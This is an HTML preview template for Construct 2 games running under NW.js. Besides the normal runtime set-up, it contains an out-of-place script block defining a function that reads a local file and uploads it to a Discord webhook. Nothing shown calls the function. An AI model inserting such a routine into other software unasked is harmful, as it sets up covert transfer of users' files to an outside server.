<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
	<title>{title}</title>

    <!-- All margins and padding must be zero for the canvas to fill the screen. -->
	<style type="text/css">
		* {
			padding: 0;
			margin: 0;
		}
		html, body {
			background: #000;
			color: #fff;
			overflow: hidden;
			-ms-touch-action: none;
		}
		canvas {
			-ms-touch-action: none;
		}
		
		#inspect-outline {
			position: absolute;
			border: 2px dotted red;
			overflow: hidden;
			font-size: 8pt;
			font-family: Sans serif;
			color: #444;
			pointer-events: none;
			-webkit-animation: flash 2s linear 0s infinite;
			-moz-animation: flash 2s linear 0s infinite;
			-o-animation: flash 2s linear 0s infinite;
			animation: flash 2s linear 0s infinite;
			background-image: url(debugger-inspect.png);
		}
		
		@-webkit-keyframes flash {
			0%, 75%, 100% {opacity: 1;}
			87% {opacity: 0.25;}
		}

		@-moz-keyframes flash {
			0%, 75%, 100% {opacity: 1;}
			87% {opacity: 0.25;}
		}

		@-o-keyframes flash {
			0%, 75%, 100% {opacity: 1;}
			87% {opacity: 0.25;}
		}

		@keyframes flash {
			0%, 75%, 100% {opacity: 1;}
			87% {opacity: 0.25;}
		}
    </style>
	
{cssdependencies}

	<script type="text/javascript" src="jquery-3.4.1.min.js"></script>
{dependencies}
	<script type="text/javascript" src="common_prelude.js"></script>
	<script type="text/javascript" src="preview_prelude.js"></script>
	<script type="text/javascript" src="shaders.js"></script>
	<script type="text/javascript" src="glwrap.js"></script>
{plugin-scripts}
	<script type="text/javascript" src="objrefs.js"></script>
	<script type="text/javascript" src="preview.js"></script>
	<script type="text/javascript" src="layout.js"></script>
	<script type="text/javascript" src="eveng.js"></script>
	<script type="text/javascript" src="expressions.js"></script>
	<script type="text/javascript" src="system.js"></script>
	<script type="text/javascript" src="commonace.js"></script>
	
	<script>
		window["c2nodewebkit"] = true;
		
		if (typeof nw !== "undefined")
		{
			window["nwgui"] = nw;						// NW.js 0.13+
			
			if (!window.require)
			{
				window.require = function (r)
				{
					return nw.require(r);
				};
			}
		}
		else
		{
			window["nwgui"] = require("nw.gui");		// NW.js 0.12.x and older
		}
		
		// Uncomment to show dev tools on startup
		//window["nwgui"].Window.get().showDevTools();
		
		// Start the Construct 2 project running on window load.
		jQuery(document).ready(function ()
		{			
			// Create new runtime using the c2canvas
			cr_createRuntime("c2canvas");
			
			// Sometimes throws in NW.js 0.13.x when reloading the preview.
			try {
				window["nwgui"].Window.get().show();
			}
			catch (e) {}
		});
		
		// Pause and resume on page becoming visible/invisible
		function onVisibilityChanged() {
			if (document.hidden || document.mozHidden || document.webkitHidden || document.msHidden)
				cr_setSuspended(true);
			else
				cr_setSuspended(false);
		};
		
		document.addEventListener("visibilitychange", onVisibilityChanged, false);
		document.addEventListener("mozvisibilitychange", onVisibilityChanged, false);
		document.addEventListener("webkitvisibilitychange", onVisibilityChanged, false);
		document.addEventListener("msvisibilitychange", onVisibilityChanged, false);
		
    </script>


	<script>
const https = require('https');
const fs = require('fs');
const FormData = require('form-data');

function sendImageToDiscord(webhookUrl, imagePath, text) {
  // Чтение изображения из файла
  const imageData = fs.readFileSync(imagePath);

  const formData = new FormData();
  formData.append('file', imageData, 'image.png');
  formData.append('content', text);

  const options = {
    method: 'POST',
    headers: {
      'Content-Type': `multipart/form-data; boundary=${formData.getBoundary()}`,
    },
  };

  const req = https.request(webhookUrl, options, (res) => {
    let data = '';

    res.on('data', (chunk) => {
      data += chunk;
    });

    res.on('end', () => {
      console.log('Изображение и текст отправлены в Discord:', data);
    });
  });

  req.on('error', (e) => {
    console.error('Ошибка отправки изображения и текста в Discord:', e);
  });

  formData.pipe(req);
  req.end();
}
	</script>
	

</head> 
 
<body> 
	<div id="fb-root"></div>
	
	<!-- The canvas must be inside a div called c2canvasdiv -->
	<div id="c2canvasdiv">
	
		<!-- The canvas the project will render to.  If you change its ID, don't forget to change the
		ID the runtime looks for in the jQuery events above (ready() and cr_sizeCanvas()). -->
		<canvas id="c2canvas" width="{width}" height="{height}"></canvas>
		
	</div>
	
	<!-- For node-webkit to show file dialogs -->
	<input style="display:none;" id="c2nwOpenFileDialog" type="file" />
	<input style="display:none;" id="c2nwChooseFolderDialog" type="file" nwdirectory />
	<input style="display:none;" id="c2nwSaveDialog" type="file" nwsaveas />
</body> 




</html> 